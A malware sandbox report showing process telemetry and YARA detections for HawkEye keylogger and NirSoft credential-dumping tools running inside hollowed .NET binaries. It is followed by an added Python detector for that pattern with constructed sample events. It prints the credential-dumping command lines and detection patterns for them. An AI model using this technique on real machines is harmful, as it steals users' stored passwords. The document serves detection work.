• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:7
Start time:19:15:23
Start date:23/04/2022
Path:C:\Users\user\AppData\Roaming\winlogons\winlogons.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\winlogons\winlogons.exe"
Imagebase:0x1280000
File size:2010632 bytes
MD5 hash:1C7E2FF84A8DA304070EC91B0FFC3051
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
Reputation:low

Target ID:8
Start time:19:15:29
Start date:23/04/2022
Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Imagebase:0x4c0000
File size:53248 bytes
MD5 hash:529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:false
Has administrator privileges:false
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.509181368.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:9
Start time:19:15:32
Start date:23/04/2022
Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8255.tmp
Imagebase:0x400000
File size:1171592 bytes
MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000000.287929150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000009.00000000.287452128.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:10
Start time:19:15:33
Start date:23/04/2022
Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp36CB.tmp
Imagebase:0x400000
File size:1171592 bytes
MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.289449551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000A.00000000.289148039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:high

Target ID:19
Start time:19:15:41
Start date:23/04/2022
Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp
Imagebase:0x400000
File size:1171592 bytes
MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000000.305602938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000000.305230219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                    Start time:19:15:49
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000000.322785031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000000.323179438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                    Start time:19:15:55
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp43C.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000000.335659001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000000.335973967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                    Start time:19:16:37
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                    Start time:19:17:01
                                                                                                                                                                                    Start date:23/04/2022
                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp4F4.tmp
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

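The process entries above show one pattern five times: the VB.NET compiler vbc.exe launched with a "/stext <file>" argument pointing at a tmpXXXX.tmp file in the user's temp directory, with the on-disk file identical every time (same size, same MD5) and the WebBrowserPassView / MailPassView detections landing only on memory dumps at image base 0x400000. That combination is what hollowing a legitimate host with a NirSoft password-recovery tool looks like in telemetry: the file hash is clean, the command line is not, because vbc.exe has no /stext switch and never writes reports to %TEMP%. The BabyShark rule firing on exactly the same memory regions as the MailPassView rule is best read as two signatures overlapping on the same embedded tool rather than as attribution on its own. The following Python is an added example, not part of the Joe Sandbox report or of any vendor's rule set; it scores process-creation events for this pattern. The event records are constructed for the example (the parent images, event ids 40 to 43 and the host list are assumptions, not data from the report), and only the shape of an event (image, command line, parent) is assumed, not any particular log format.

```python
"""Flag NirSoft credential dumpers hosted in hollowed .NET Framework binaries.

Added example, not part of the Joe Sandbox report. Sample events are CONSTRUCTED.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# .NET Framework binaries that injectors commonly abuse as sacrificial hosts.
# Assumption: illustrative list; extend it to the hosts your telemetry shows.
SACRIFICIAL_HOSTS = {
    "vbc.exe", "csc.exe", "regasm.exe", "regsvcs.exe",
    "msbuild.exe", "installutil.exe", "aspnet_compiler.exe",
}

# "Save report" switches of the NirSoft password-recovery tools
# (WebBrowserPassView, Mail PassView, ...). None of the hosts above accept them.
# Anchored at end of line so the report's malformed quoting (closing quote after
# the image path, none after the output file) still parses.
_SAVE_SWITCH_RE = re.compile(
    r'(?<![\w\\])(/s(?:text|tabular|tab|comma|verhtml|html|xml))\s+"?([^"]+?)"?\s*$',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcessEvent:
    event_id: int        # constructed identifier (mirrors the report's Target ID)
    image: str           # full path of the executed image
    command_line: str    # command line as logged
    parent_image: str    # full path of the parent (constructed for the samples)


@dataclass(frozen=True)
class Finding:
    event_id: int
    host: str
    switch: str
    output_path: str
    reasons: Tuple[str, ...]


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows path; tolerates forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_save_switch(command_line: str) -> Optional[Tuple[str, str]]:
    """Return (switch, output_path) when a NirSoft save switch is present."""
    m = _SAVE_SWITCH_RE.search(command_line)
    if not m:
        return None
    return m.group(1).lower(), m.group(2).strip()


def evaluate(ev: ProcessEvent) -> Optional[Finding]:
    """Score one event; None means 'not this pattern'."""
    host = image_name(ev.image)
    if host not in SACRIFICIAL_HOSTS:
        return None                     # e.g. the genuine NirSoft exe: a different rule
    parsed = parse_save_switch(ev.command_line)
    if parsed is None:
        return None                     # ordinary compiler invocation
    switch, out_path = parsed
    reasons = [f"{host} has no {switch} switch; it is a NirSoft report switch"]
    if "\\appdata\\local\\temp\\" in out_path.lower():
        reasons.append("report written to the user's temp directory")
    out_name = image_name(out_path)
    if out_name.startswith("tmp") and out_name.endswith(".tmp"):
        reasons.append("GetTempFileName-style output name (tmpXXXX.tmp)")
    if "\\users\\" in ev.parent_image.lower():
        reasons.append("spawned by a binary under C:\\Users (user-writable location)")
    return Finding(ev.event_id, host, switch, out_path, tuple(reasons))


def scan(events: List[ProcessEvent]) -> List[Finding]:
    return [f for f in (evaluate(e) for e in events) if f is not None]


VBC = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
IU = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

# Constructed sample events. 19 and 30 copy the shape of the report's entries
# (stray quote after vbc.exe exactly as logged; parent image is assumed).
# 40 to 43 are benign or out-of-scope controls and are entirely made up.
SAMPLE_EVENTS = [
    ProcessEvent(19, VBC, VBC + r'" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp',
                 r"C:\Users\user\Desktop\dropper.exe"),
    ProcessEvent(30, VBC, VBC + r'" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp',
                 r"C:\Users\user\Desktop\dropper.exe"),
    ProcessEvent(40, CSC, '"' + CSC + r'" /noconfig /fullpaths @"C:\Users\dev\AppData\Local\Temp\xyz.cmdline"',
                 r"C:\Program Files\dotnet\MSBuild.exe"),
    ProcessEvent(41, VBC, VBC + r" /noconfig /nostdlib /out:App.exe Program.vb",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(42, r"C:\Tools\WebBrowserPassView.exe", r"WebBrowserPassView.exe /stext C:\Tools\report.txt",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(43, IU, r'InstallUtil.exe /scomma "C:\Users\user\AppData\Roaming\out.csv"',
                 r"C:\Program Files\Vendor\setup.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.event_id}] {f.host} {f.switch} -> {f.output_path}")
        for r in f.reasons:
            print("    -", r)
```

Events 19 and 30 score on all four reasons, the InstallUtil control scores on the switch alone, and the compiler invocations and the stand-alone NirSoft binary are not matched: the rule is about a host that cannot legitimately take that switch, so a hash or signature check on vbc.exe itself would never fire here.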
No disassembly